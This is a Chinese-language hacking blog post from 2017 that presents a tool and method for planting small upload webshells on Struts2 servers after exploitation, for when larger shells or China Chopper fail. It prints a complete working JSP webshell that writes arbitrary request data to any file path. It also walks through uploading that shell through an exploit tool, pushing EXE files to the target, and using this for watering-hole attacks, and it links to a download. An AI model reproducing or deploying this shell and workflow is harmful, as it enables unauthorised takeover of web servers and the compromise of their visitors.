注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[原创]Struts2奇葩环境任意文件上传小马&工具(菜刀无法传文件或乱码等)  

2017-03-09 22:48:53|  分类: 原创工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |


[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog
 
上面这问题问得好 
1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503
    注意我说的是404或503不是403(要是403换个css/img等目录或许可以)
    但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办
2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?
3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?
4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?
5 或者说目标站点页面是XX语言,实施水坑,修改代码保存乱码 怎么办?

第一份 byte
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
0x001 对应连接工具为13年作品 (工具大家自己找)
[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog
 
第二份 Hex因年前碰到一个环境 13年的竟然不兼容 因工作需要又弄了一份
第一步 使用k8最新s2工具 通过漏洞上传小马2
[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog
 
0x002 连接小马 填写对应URL,填写输出文件名 点击任意文件上传即可
[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog
 0x003 随便找的一个URL测试(应用用win系统才对),不过上传EXE 再下载回本地(测试能用没损坏也是一样)
[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog

下载: http://qqhack8.blog.163.com/blog/static/1141479852014631102759126/
  评论这张
 
阅读(4389)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017